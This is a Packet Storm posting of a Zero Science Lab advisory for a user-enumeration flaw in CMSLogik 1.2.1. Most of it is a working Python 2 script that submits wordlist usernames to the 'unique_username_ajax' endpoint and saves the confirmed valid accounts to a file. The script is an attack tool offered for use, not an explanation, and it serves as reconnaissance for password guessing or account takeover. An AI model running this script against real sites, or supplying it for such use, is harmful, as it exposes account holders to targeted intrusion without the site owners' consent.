CMSLogik version 1.2.1 suffers from a user enumeration weakness vulnerability.
e2341029bd4b0b4be62556695943838129160100fef2bcf39d008c3fc5e97008#!/usr/bin/python
#
# CMSLogik 1.2.1 (user param) User Enumeration Weakness
#
#
# Vendor: ThemeLogik
# Product web page: http://www.themelogik.com/cmslogik
# Affected version: 1.2.1 and 1.2.0
#
# Summary: CMSLogik is built on a solid & lightweight framework
# called CodeIgniter, and design powered by Bootstrap. This
# combination allows for greater security, extensive flexibility,
# and ease of use. You can use CMSLogik for almost any niche that
# your project might fall into.
#
# Desc: The weakness is caused due to the 'unique_username_ajax'
# script enumerating the list of valid usernames when some characters
# are provided via the 'user' parameter.
#
# Tested on: Apache/2.2.22
# PHP/5.3.15
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2013-5137
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5137.php
#
#
# 05.04.2013
#
import argparse, sys, json, urllib, urllib2, cookielib
from colorama import Fore, Back, Style, init
init()
print '\n-----------------------------------------------'
print 'User Enumeration Tool v0.1 for CMSLogik 1.2.x'
print 'Copyleft (c) 2013, Zero Science Lab'
print 'by lqwrm'
print '-----------------------------------------------\n'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-d', help='target dir', action='store', dest='dir')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')
args = parser.parse_args()
if len(sys.argv) != 7:
parser.print_help()
print '\n[*] Example: cmslogik_enum.py -t zeroscience.mk -d cmslogik -f users.txt'
sys.exit()
host = args.target
path = args.dir
fn = args.file
print '\n'
try:
users = open(args.file, 'r')
except(IOError):
print '[!] Error opening \'' +fn+ '\' file.'
sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
results = open('validusers.txt', 'w')
for line in lines:
chk_usr = urllib.urlencode({'user' : line})
try:
xhr = json.load(opener.open('http://' +host+ '/' +path+ '/main/unique_username_ajax', chk_usr))
except:
print '[!] Error connecting to http://' +host+ '/' +path
sys.exit()
print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
for key, value in xhr.iteritems():
fnrand = value
break
if fnrand == '1':
print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Style.RESET_ALL+Fore.RESET+ ' as valid registered user.'
results.write('%s\n' % line)
results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.'
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed